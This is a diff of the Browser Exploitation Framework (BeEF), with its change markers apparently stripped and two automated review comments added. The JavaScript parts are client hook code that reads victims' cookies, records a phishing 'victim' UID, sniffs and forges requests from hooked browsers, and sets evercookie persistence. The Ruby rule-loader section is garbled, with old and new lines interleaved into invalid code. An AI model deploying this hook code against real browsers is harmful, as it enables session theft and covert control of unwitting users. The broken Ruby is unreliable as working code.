chain_mode = data['chain_mode']
begin
BeEF::Core::AutorunEngine::Parser.instance.parse(
name,
author,
browser,
browser_version,
os,
os_version,
modules,
execution_order,
execution_delay,
chain_mode
)
rescue => e
print_error("[ARE] Error loading ruleset (#{name}): #{e.message}")
return { 'success' => false, 'error' => e.message }
end
existing_rule = BeEF::Core::Models::Rule.where(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
).first
unless existing_rule.nil?
msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
return { 'success' => false, 'error' => msg }
end
are_rule = BeEF::Core::Models::Rule.new(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
)
are_rule.save
print_info("[ARE] Ruleset (#{name}) parsed and stored successfully.")
if @debug_on
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more 'Modules to run:'
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more '(*) Options:'
mod['options'].each do |key, value|
print_more "\t#{key}: (#{value})"
end
end
print_more "Exec order: #{execution_order}"
print_more "Exec delay: #{exec_delay}"
end
{ 'success' => true, 'rule_id' => are_rule.id }
rescue TypeError, ArgumentError => e
print_error("[ARE] Failed to load ruleset (#{name}): #{e.message}")
{ 'success' => false, 'error' => e.message }
end
# Update an ARE rule set.
# @param [Hash] ARE rule ID.
# @param [Hash] ARE ruleset as JSON
# @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
def update_rule_json(id, data)
# Quite similar in implementation to load_rule_json. Might benefit from a refactor.
name = data['name'] || ''
author = data['author'] || ''
browser = data['browser'] || 'ALL'
browser_version = data['browser_version'] || 'ALL'
os = data['os'] || 'ALL'
os_version = data['os_version'] || 'ALL'
modules = data['modules']
execution_order = data['execution_order']
execution_delay = data['execution_delay']
chain_mode = data['chain_mode'] || 'sequential'
begin
BeEF::Core::AutorunEngine::Parser.instance.parse(
name,
author,
browser,
browser_version,
os,
os_version,
modules,
execution_order,
execution_delay,
chain_mode
)
rescue => e
print_error("[ARE] Error updating ruleset (#{name}): #{e.message}")
return { 'success' => false, 'error' => e.message }
end
existing_rule = BeEF::Core::Models::Rule.where(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
).first
unless existing_rule.nil?
msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
return { 'success' => false, 'error' => msg }
end
old_are_rule = BeEF::Core::Models::Rule.find_by(id: id)
old_are_rule.update(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
name, author, browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode
)
print_info("[ARE] Ruleset (#{name}) updated successfully.")
if @debug_on
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more 'Modules to run:'
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more '(*) Options:'
mod['options'].each do |key, value|
print_more "\t#{key}: (#{value})"
if parser_result.length == 1 && parser_result.first
print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
if @debug_on
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more 'Modules to Trigger:'
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more '(*) Options:'
mod['options'].each do |key, value|
print_more "\t#{key}: (#{value})"
end
end
print_more "Exec order: #{exec_order}"
print_more "Exec delay: #{exec_delay}"
end
print_more "Exec order: #{execution_order}"
print_more "Exec delay: #{exec_delay}"
are_rule = BeEF::Core::Models::Rule.new(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: exec_order,
execution_delay: exec_delay,
chain_mode: chain_mode
)
are_rule.save
{ 'success' => true, 'rule_id' => are_rule.id }
else
print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
{ 'success' => false, 'error' => parser_result.last }
end
{ 'success' => true }
rescue TypeError, ArgumentError => e
print_error("[ARE] Failed to update ruleset (#{name}): #{e.message}")
{ 'success' => false, 'error' => e.message }
rescue StandardError => e
err = 'Malformed JSON ruleset.'
print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
{ 'success' => false, 'error' => err }
end
# Load an ARE ruleset from file
# @param [String] JSON ARE ruleset file path
def load_rule_file(json_rule_path)
def load_file(json_rule_path)
rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
self.load_rule_json(JSON.parse(rule_file))
rescue => e
print_error("[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}")
self.load JSON.parse(rule_file)
rescue StandardError => e
print_error "[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}"
end
# Load all JSON ARE rule files from arerules/enabled/ directory
def load_directory
Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule_file|
print_debug("[ARE] Processing ruleset file: #{rule_file}")
load_rule_file(rule_file)
Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
print_debug "[ARE] Processing rule: #{rule}"
load_file rule
end
end
end
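Review bot: `load` ignores the return value of `are_rule.save`, so when the record is not stored the method still answers `{ 'success' => true, 'rule_id' => are_rule.id }` with a `nil` id. Checking the result, e.g. `return { 'success' => false, 'error' => 'Could not store ruleset' } unless are_rule.save`, keeps the response truthful. The "parsed and stored successfully" message is also printed before the record is created, so moving it after the save would make the log match what happened.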


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -944,25 +944,14 @@ beef.browser = {
*/
isFF99: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
},
/**
* Returns true if the browser is any version of Firefox.
* @example: beef.browser.isFFbowser()
*/
isFFbowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Firefox';
},
/**
* Returns true if the browser is any version of Firefox.
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function () {
var legacyCheck = this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
return legacyCheck || this.isFFbowser();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
},
/**
@@ -2449,23 +2438,12 @@ beef.browser = {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 99) ? true : false);
},
/**
* Returns true for modern versions of Chrome (above 9).
* @example: beef.browser.isCbowser()
*/
isCbowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Chrome';
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function () {
var legacyCheck = this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || 
this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
return legacyCheck || this.isCbowser();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| 
this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
},
/**
@@ -2508,23 +2486,12 @@ beef.browser = {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
},
/**
* Returns true if the browser is any version of Opera.
* @example: beef.browser.isObowser()
*/
isObowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Opera';
},
/**
* Returns true if Opera.
* @example: beef.browser.isO()
*/
isO: function () {
var legacyCheck = this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
return legacyCheck || this.isObowser();
return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
},
/**
@@ -4298,6 +4265,9 @@ beef.browser = {
try {
var cookies = document.cookie;
/* Never stop the madness dear C.
* var veglol = beef.browser.cookie.veganLol();
*/
if (cookies) details['browser.window.cookies'] = cookies;
} catch (e) {
beef.debug("Cookies can't be read. The hooked origin is most probably using HttpOnly.");
@@ -4361,6 +4331,24 @@ beef.browser = {
if (has_wmp) details['browser.capabilities.wmp'] = has_wmp;
if (has_vlc) details['browser.capabilities.vlc'] = has_vlc;
var pf_integration = "<%= @phishing_frenzy_enable %>";
if (pf_integration) {
var pf_param = "uid";
var pf_victim_uid = "";
var location_search = window.location.search.substring(1);
var params = location_search.split('&');
for (var i = 0; i < params.length; i++) {
var param_entry = params[i].split('=');
if (param_entry[0] == pf_param) {
pf_victim_uid = param_entry[1];
details['PhishingFrenzyUID'] = pf_victim_uid;
break;
}
}
} else {
details['PhishingFrenzyUID'] = "N/A";
}
return details;
},


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -72,7 +72,7 @@ beef.browser.cookie = {
},
/** @memberof beef.browser.cookie */
cookieValueRandomizer: function (){
veganLol: function (){
var to_hell= '';
var min = 17;
var max = 25;
@@ -100,7 +100,7 @@ beef.browser.cookie = {
},
/** @memberof beef.browser.cookie */
hasSessionCookies: function (name){
this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), '', '/', '', '' );
this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
@@ -109,7 +109,7 @@ beef.browser.cookie = {
},
/** @memberof beef.browser.cookie */
hasPersistentCookies: function (name){
this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), 1, '/', '', '' );
this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
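Review bot: `cookiesEnabled` is assigned without a declaration in both hasSessionCookies and hasPersistentCookies, so unless it is declared at file level outside these hunks each call creates or overwrites a global, and the assignment throws under strict mode. Declaring it locally and dropping the redundant ternary would read `var cookiesEnabled = this.getCookie(name) != null;`. The helper named `veganLol` also carries only a bare `@memberof` tag, and the name does not say what it does; a one-line description such as `Returns a random string used as a throwaway cookie value` would help, though that wording is inferred from the `min`/`max` locals because its body lies outside the hunk. Both cookie-check functions also continue past the end of their hunks.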


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

File diff suppressed because one or more lines are too long




@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -31,7 +31,7 @@
* for example, if someone deletes all but one type of cookie, once
* that cookie is re-discovered, all of the other cookie types get reset
*
* !!! SOME OF THESE ARE CROSS-ORIGIN COOKIES, THIS MEANS
* !!! SOME OF THESE ARE CROSS-DOMAIN COOKIES, THIS MEANS
* OTHER SITES WILL BE ABLE TO READ SOME OF THESE COOKIES !!!
*
* USAGE:
@@ -803,7 +803,7 @@ this.evercookie_cookie = function(name, value)
else
return this.getFromStr(name, document.cookie);
}catch(e){
// the hooked origin is using HttpOnly, so we must set the hook ID in a different way.
// the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
// evercookie_userdata and evercookie_window will be used in this case.
}
};

1
core/main/client/lib/jools.min.js vendored Normal file

File diff suppressed because one or more lines are too long


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -38,7 +38,7 @@ beef.mitb = {
if (method == "GET") {
//GET request -> cross-origin
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossOrigin Request]: " + url);
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}else { //GET request -> same-origin
beef.mitb.sniff("GET [Ajax Request]: " + url);


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -74,7 +74,7 @@ beef.net = {
this.status_text = null; // success, timeout, error, ...
this.response_body = null; // "<html>…." if not a cross-origin request
this.port_status = null; // tcp port is open, closed or not http
this.was_cross_origin = null; // true or false
this.was_cross_domain = null; // true or false
this.was_timedout = null; // the user specified timeout was reached
this.duration = null; // how long it took for the request to complete
this.headers = null; // full response headers
@@ -217,11 +217,11 @@ beef.net = {
* @return {Object} this object contains the response details
*/
request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same origin or cross origin
var cross_origin = true;
//check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
if (document.location.port == "" || document.location.port == null) {
cross_origin = !(port == "80" || port == "443");
cross_domain = !(port == "80" || port == "443");
}
}
@@ -238,12 +238,12 @@ beef.net = {
//define response object
var response = new this.response;
response.was_cross_origin = cross_origin;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for cross origin requests.
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST") {
$j.ajaxSetup({
@@ -310,7 +310,7 @@ beef.net = {
/**
* Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
* - requestid: needed on the callback
* - allowCrossOrigin: set cross-origin requests as allowed or blocked
* - allowCrossDomain: set cross-domain requests as allowed or blocked
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
* Example usage:
@@ -318,20 +318,20 @@ beef.net = {
* true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
* alert(response.response_body)})
*/
forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossOrigin, requestid, callback) {
forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
if (domain == "undefined" || path == "undefined") {
beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
return;
}
// check if same origin or cross origin
var cross_origin = true;
// check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain && document.location.protocol == scheme + ':') {
if (document.location.port == "" || document.location.port == null) {
cross_origin = !(port == "80" || port == "443");
cross_domain = !(port == "80" || port == "443");
} else {
if (document.location.port == port) cross_origin = false;
if (document.location.port == port) cross_domain = false;
}
}
@@ -348,23 +348,23 @@ beef.net = {
// define response object
var response = new this.response;
response.was_cross_origin = cross_origin;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
// if cross-origin requests are not allowed and the request is cross-origin
// if cross-domain requests are not allowed and the request is cross-domain
// don't proceed and return
if (allowCrossOrigin == "false" && cross_origin) {
if (allowCrossDomain == "false" && cross_domain) {
beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
response.status_code = -1;
response.status_text = "crossorigin";
response.port_status = "crossorigin";
response.status_text = "crossdomain";
response.port_status = "crossdomain";
response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
if (callback != null) callback(response, requestid);
return response;
}
// if the request was cross-origin from a HTTPS origin to HTTP
// if the request was cross-domain from a HTTPS origin to HTTP
// don't proceed and return
if (document.location.protocol == 'https:' && scheme == 'http') {
beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
@@ -379,7 +379,7 @@ beef.net = {
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for cross origin requests.
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST") {
$j.ajaxSetup({
@@ -432,10 +432,10 @@ beef.net = {
},
complete: function (xhr, textStatus) {
// cross-origin request
if (cross_origin) {
// cross-domain request
if (cross_domain) {
